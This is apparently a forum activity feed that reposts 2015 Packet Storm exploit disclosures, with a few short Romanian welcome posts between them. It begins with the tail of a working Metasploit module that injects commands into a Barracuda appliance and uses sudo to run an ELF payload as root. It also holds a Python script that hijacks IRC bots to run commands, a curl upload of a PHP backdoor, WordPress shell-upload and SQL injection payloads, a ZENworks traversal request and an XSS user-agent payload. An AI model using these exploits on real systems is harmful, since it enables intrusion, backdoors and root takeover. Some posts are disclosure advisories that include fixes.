Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
  14. ################################################################################################## #Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility #Author : Manish Kishan Tanwar AKA error1046 #Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ #Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip #Date : 9/04/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server and hence vulnerable to arbitrary file upload //////////////// /// POC //// /////////////// Uploading PHP shell ================================= Just open uploader.php in plugin directory Access Denied browse your php shell and submit it. after uploading, you will get your shell in uploads directory at following location http://target.com/wp-content/uploads/i-dump-uploads/ demo:- 404 Not Found and upload your shell --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source: http://packetstorm.wowhacker.com/1504-exploits/wpwdippu-upload.txt
  15. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Product: phpTrafficA Product page: phpTrafficA Homepage Affected versions: Up to and including 2.3 (latest as of writing). Description: The user agent string provided by the browser is not sanitized nor escaped when handled. This string is then outputting into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialogbox to pop up as soon as the page is visited: "><script>alert();</script> This page can be hidden from the public, in which case only admins can visit it. However, the script still executes when they do, which could enable a malicious user agent to steal the phpTrafficA cookie (no expiry) or other admin credentials. Proposed fix: Escape the HTML characters with htmlspecialchars before outputting the user agent string. In: Php/stats/statsRecent.inc.php Line 304: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,$agent)."</td><td>$page</td><td>$refString</td></tr>\n"; becomes: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,htmlspecialchars($agent))."</td><td>$page</td><td>$refString</td></tr>\n"; Line 369: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": $thisagent<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; becomes: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": ".htmlspecialchars($thisagent)."<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; Best regards, Daniel Geerts -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJVJPGzAAoJEHn1bVIKHk5N5egP/0FRgNCiTwYyFwmqgcNLxOQ5 yuJtnGdGFvH0axXlvm+AgVYOtmM4erduSR3hCaSx4ER7f30SZkRCUuaW8aR1/Tow bdYzLXNHcY21gXkhHt+bWH7ZkEpUWxXR6ZzrwL5QO3Ez+QkDr1HUmg8QQPUia8Qk KGY+dbkRXqVR7MYRGjAbyceOEXpxpOtxaZ9UTSmQTGW31Upu+dmqkkOTbvV20tEj N07T4UwMffCGNWloeuXg8QvIlvwe22kV3+frA2qGxdWKHVl66iJAV0pQ+bxDgoxe Y3JsYKdeIhB6T0Yt7rpEbzlgaupQ9pg279bzGVVD4Z+AuNhvDY/4K6RZsFB11DGv eY4VR8KLyNuw5N/wLBGf9ZSL9dLBGatYxi0HoQtrmFqLppo1x6nhEV6A0gRulWRa 9L04PdWKmv+2/prwW9ygT7UFIdApT1q3Uljq9QQIWmdDxGx3YxFmvMVpC5NThtxO ElN8fhQpUKFss439qiLaGEMKO/D4bNC71Ydo6jvZOWQ+9eBxmMUT7XfK6fnB811c RTRON1SG73AWcbfpIJ/dM+g0jm6bcvVVQxNmaARdlf+E2ihXnMPU2k39ndfV/vqD 7iuZQraH1ZrQJAqjVmzHWvEfEPyeaiJPRguu1kmnG8QkSMDtBHIpGvvHCHSU4ioF +wxMYqlgbfJGakc4s5RO =wCVy -----END PGP SIGNATURE----- Source: http://packetstorm.wowhacker.com/1504-exploits/phptraffica23-xss.txt
  16. >> Remote code execution in Novell ZENworks Configuration Management 11.3.1 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 07/04/2015 / Last updated: 07/04/2015 >> Background on the affected product: "Automate and accelerate your Windows 7 migration Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts. Boost user productivity Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use. Eliminate IT effort Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices. Expand your freedom to choose Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more. Simplify deployment with virtual appliances Slash deployment times with a convenient virtual appliance deployment option. Enjoy a truly unified solution Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks consoleâcalled ZENworks Control Center." This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite. A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell: - Did not bother issuing a security advisory to their customers. - Did not credit me even though I did responsible disclosure. - Refused to provide a CVE number for months. - Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module). - Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776). >> Technical details: Vulnerability: Remote code execution via file upload and directory traversal CVE-2015-0779 Constraints: none; no authentication or any other information needed Affected versions: ZENworks Configuration Management 11.3.1 and below POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war <WAR file payload in the body> The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be "../webapps/"). A Metasploit module that exploits this vulnerability has been released. >> Fix: Upgrade to version ZENworks Configuration Management 11.3.2. [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5096 Source: http://packetstorm.wowhacker.com/1504-exploits/zenworks-exectraversal.txt
  17. ###################### # Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ # Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U # Date : 2015-04-05 # Tested on : Linux / Mozilla Firefox ###################### # Description WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability There are some pages with wordpress esc_sql function. esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - Dewhurst Security) isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = ''; isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = ''; - admin/wp-security-list-404.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'id'; $order = !empty($order) ? esc_sql($order) : 'DESC'; ... ... $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A); - admin/wp-security-list-login-fails.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A); - admin/wp-security-list-acct-activity-php $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A) - admin/wp-security-list-locked-ip.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A) ###################### # PoC http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc ###################### # Vulnerability Disclosure Timeline: 2015-04-05: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (3.9.1) 2015-04-07: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpallinone-sql.txt
  18. Update 0.2.5.12 Download: TOR Virtual Network Tunneling Tool 0.2.5.12 ? Packet Storm
  19. Bun venit nenea reparator. sper s? culegi de aici doar lucrurile bune.
  20. # thehunter.py # Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution # author: @shipcod3 # description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def usage(): print("USAGE: python thehunter.py nick \n") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot server = "us.dal.net" #irc server channel = "#buhaypirata" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 6667)) #connects to the server irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv) Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt
  21. ###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpworktheflow252-shell.txt
  22. *6kbbs v8.0 SQL Injection Security Vulnerabilities* Exploit Title: 6kbbs Multiple SQL Injection Security Vulnerabilities Vendor: 6kbbs Product: 6kbbs Vulnerable Versions: v7.1 v8.0 Tested Version: v7.1 v8.0 Advisory Publication: April 01, 2015 Latest Update: April 01, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details: * *(1) Vendor & Product Description: * *Vendor: * 6kbbs *Product & Vulnerable Versions: * 6kbbs v7.1 v8.0 *Vendor URL & download: * 6kbbs can be obtained from here, ???? - 6KBBS?? download 6kbbs PHP Forum V8.0 source code *Product Introduction Overview: * "6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions." "Interface: Using XHTML + CSS architecture, so that the structure of the page, easy to modify the interface; save the transmission of static page code, greatly reducing the amount of data transmitted over the network; improve the interface scalability, more in line with WEB standards, support Internet Explorer, FireFox, Opera and other mainstream browsers. The program: using ASP + ACCESS mature technology, the installation process is extremely simple, the operating environment is also very common." *(2) Vulnerability Details: * 6kbbs web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. Several 6kbbs products 0-day vulnerabilities have been found by some other bug hunter researchers before. 6kbbs has patched some of them. Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, solutions details related to 6kbbs vulnerabilities. *(2.1) *The first code programming flaw occurs at "/ajaxmember.php?" page with "&userid" parameter. *(2.2) *The second code programming flaw occurs at "/admin.php?" page with "&inc" parameter. *References: * 6kbbs v8.0 SQL Injection Security Vulnerabilities – Information Security - Tetraph Information Security - IT & Computer & Web & Database & Application Related Posts: 6kbbs v8.0 SQL Injection Security Vulnerabilities 6kbbs v8.0 SQL Injection Security Vulnerabilities | Kaleidoscope - InZeed http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-sql-injection-security-vulnerabilities/ https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-sql-injection-security-vulnerabilities/ http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2 http://packetstormsecurity.com/files/authors/11270 http://www.osvdb.org/show/osvdb/117505 http://milw00rm.net/exploits/6367 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source: http://packetstorm.wowhacker.com/1504-exploits/6kbbs-sql.txt
  23. Bun venit Smyley , sper s? înve?i ceva de aici.
  24. Bun venit mane ( Ignor? criticile ).
  25. KhiZaRix

    Salut

    Bine ai venit printre noi.
×
×
  • Create New...